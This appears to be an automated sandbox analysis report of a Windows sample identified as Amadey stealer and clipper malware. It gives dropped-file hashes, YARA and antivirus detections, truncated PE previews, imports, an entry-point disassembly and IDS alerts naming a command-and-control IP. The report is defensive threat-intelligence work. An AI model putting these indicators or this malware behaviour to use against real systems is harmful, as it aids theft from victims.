                                                                      SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: UUZl6EPjNN.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):347136
                                                                      Entropy (8bit):7.642032843699542
                                                                      Encrypted:false
                                                                      SSDEEP:6144:KMy+bnr+Vp0yN90QECj84+S0b8uLwNIBmJqVZJzxWN7HEm7uN9j:MMrNy90wj84L0b8uk3JAZd4N7HEmirj
                                                                      MD5:F0D05D7896B3839E5CFBCC78E4FD87FF
                                                                      SHA1:F1B614BD9DC2DF396540AF1D75A8F41BFE79DBA6
                                                                      SHA-256:02108271649642C959DABE306ECD825A07B9978222B46E31C12E68C80154A640
                                                                      SHA-512:37F08DA2D33FCC3F70DBC21CCAA293C5E581E7E513BD9F54288BCB1D635DED8AFEB1D0A5943DE1E804008A5D52DA71193CA40AEC8712C2B51AE1A5C34B256660
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................d.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............B..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):241664
                                                                      Entropy (8bit):6.368190069123744
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                      MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                      SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                      SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):251904
                                                                      Entropy (8bit):7.321306380812188
                                                                      Encrypted:false
                                                                      SSDEEP:3072:adiOoncra5PLzEOWFv5rIEWCSvqKejU8DP6CIqzcQyPCzDXCU2+0:adiw2PLoO8+EW31UU8DP8wyPCzDXCF+
                                                                      MD5:5DD55AE0E5CCD8EF2E82679ED0FC11C9
                                                                      SHA1:DD85E81353FE4D09EBD4027121966540186804CE
                                                                      SHA-256:ACE074FAEA020BD3F3AAAB059C4F19F4217DA45BBD1A7DEB06303CCB0B919B91
                                                                      SHA-512:CD09D2392382A6235D050E0B4B88FE307053E5B319022B8EEA7C604BD023CD9B73CFEA54A8B7DAE2150C6A28ED447EC299F3149CD872CBB11E1761E64BF5F778
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%...%...%.B.....%.....%.....%...^...%...$.y.%.....%.....%.....%.Rich..%.........PE..L....].a............................?q............@.........................................................................<...P....p..............................0................................8..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.97029807367379
                                                                      Encrypted:false
                                                                      SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                      MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                      SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                      SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                      SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):4.621829903792328
                                                                      Encrypted:false
                                                                      SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                      MD5:1B7C22A214949975556626D7217E9A39
                                                                      SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                      SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                      SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                      Malicious:false
                                                                      Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                      Process:C:\Windows\SysWOW64\cacls.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15
                                                                      Entropy (8bit):3.240223928941852
                                                                      Encrypted:false
                                                                      SSDEEP:3:o3F:o1
                                                                      MD5:509B054634B6DE74F111C3E646BC80FD
                                                                      SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                      SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                      SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                      Malicious:false
                                                                      Preview:processed dir:
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.809928843076803
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:538112
                                                                      MD5:f4b906685385629998faa352a94a2e1f
                                                                      SHA1:97ebb6ba0f496f6cabdec20d5c8af07495a00e15
                                                                      SHA256:49d5e821c721205ae44d6ef76450b6a1307e06308900065d18ebad11c6abe74f
                                                                      SHA512:0a0ec9df88fe00c954fed05f4033df0b4c08fbe129045ff174a1c788fe7b0e421ade1bfb0b5881e34ad119bf1c7030341375ebe8c6d78e29a59789fcc0d6ab44
                                                                      SSDEEP:12288:pMryy90yNjwAz3QZDk3JlZdK77HEmCrh8B7l369GVzcr:fyhNjzLaDk3JlZKEfrh8Bp36A0
                                                                      TLSH:FEB4020BB7E88032E8B1677014F902D306377EA1AB7C43D7624AAC5E1C726A4E775767
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                      Icon Hash:f8e0e4e8ecccc870
                                                                      Entrypoint:0x406a60
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:10
                                                                      OS Version Minor:0
                                                                      File Version Major:10
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:10
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                      Instruction
                                                                      call 00007F4FE0FDF935h
                                                                      jmp 00007F4FE0FDF245h
                                                                      push 00000058h
                                                                      push 004072B8h
                                                                      call 00007F4FE0FDF9D7h
                                                                      xor ebx, ebx
                                                                      mov dword ptr [ebp-20h], ebx
                                                                      lea eax, dword ptr [ebp-68h]
                                                                      push eax
                                                                      call dword ptr [0040A184h]
                                                                      mov dword ptr [ebp-04h], ebx
                                                                      mov eax, dword ptr fs:[00000018h]
                                                                      mov esi, dword ptr [eax+04h]
                                                                      mov edi, ebx
                                                                      mov edx, 004088ACh
                                                                      mov ecx, esi
                                                                      xor eax, eax
                                                                      lock cmpxchg dword ptr [edx], ecx
                                                                      test eax, eax
                                                                      je 00007F4FE0FDF25Ah
                                                                      cmp eax, esi
                                                                      jne 00007F4FE0FDF249h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      mov edi, esi
                                                                      jmp 00007F4FE0FDF252h
                                                                      push 000003E8h
                                                                      call dword ptr [0040A188h]
                                                                      jmp 00007F4FE0FDF219h
                                                                      xor esi, esi
                                                                      inc esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F4FE0FDF24Ch
                                                                      push 0000001Fh
                                                                      call 00007F4FE0FDF76Bh
                                                                      pop ecx
                                                                      jmp 00007F4FE0FDF27Ch
                                                                      cmp dword ptr [004088B0h], ebx
                                                                      jne 00007F4FE0FDF26Eh
                                                                      mov dword ptr [004088B0h], esi
                                                                      push 004010C4h
                                                                      push 004010B8h
                                                                      call 00007F4FE0FDF396h
                                                                      pop ecx
                                                                      pop ecx
                                                                      test eax, eax
                                                                      je 00007F4FE0FDF259h
                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                      mov eax, 000000FFh
                                                                      jmp 00007F4FE0FDF379h
                                                                      mov dword ptr [004081E4h], esi
                                                                      cmp dword ptr [004088B0h], esi
                                                                      jne 00007F4FE0FDF25Dh
                                                                      push 004010B4h
                                                                      push 004010ACh
                                                                      call 00007F4FE0FDF925h
                                                                      pop ecx
                                                                      pop ecx
                                                                      mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x7afe0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x87000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x7b000 | 0x7b000 | False | 0.9250964653201219 | data | 7.854359084235584 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x87000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0x5d302 | Microsoft Cabinet archive data, many, 381698 bytes, 2 files, at 0x2c +A "bPsg.exe" +A "xriv.exe", ID 1589, number 1, 18 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x85eb4 | 0x4 | data | English | United States
RT_RCDATA | 0x85eb8 | 0x24 | data | English | United States
RT_RCDATA | 0x85edc | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x85ee4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x85eec | 0x4 | data | English | United States
RT_RCDATA | 0x85ef0 | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x85efc | 0x4 | data | English | United States
RT_RCDATA | 0x85f00 | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x85f0c | 0x4 | data | English | United States
RT_RCDATA | 0x85f10 | 0x6 | data | English | United States
RT_RCDATA | 0x85f18 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x85f20 | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0x85f28 | 0xbc | data | English | United States
RT_VERSION | 0x85fe4 | 0x408 | data | English | United States
RT_VERSION | 0x863ec | 0x410 | data | Russian | Russia
RT_MANIFEST | 0x867fc | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                      192.168.2.762.204.41.450157802027700 02/07/23-23:09:05.447048TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450353802027700 02/07/23-23:09:57.891553TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449725802027700 02/07/23-23:07:09.061494TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449790802027700 02/07/23-23:07:26.361222TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450344802027700 02/07/23-23:09:55.700525TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450143802027700 02/07/23-23:09:02.035667TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449781802027700 02/07/23-23:07:24.188556TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.762.204.41.4
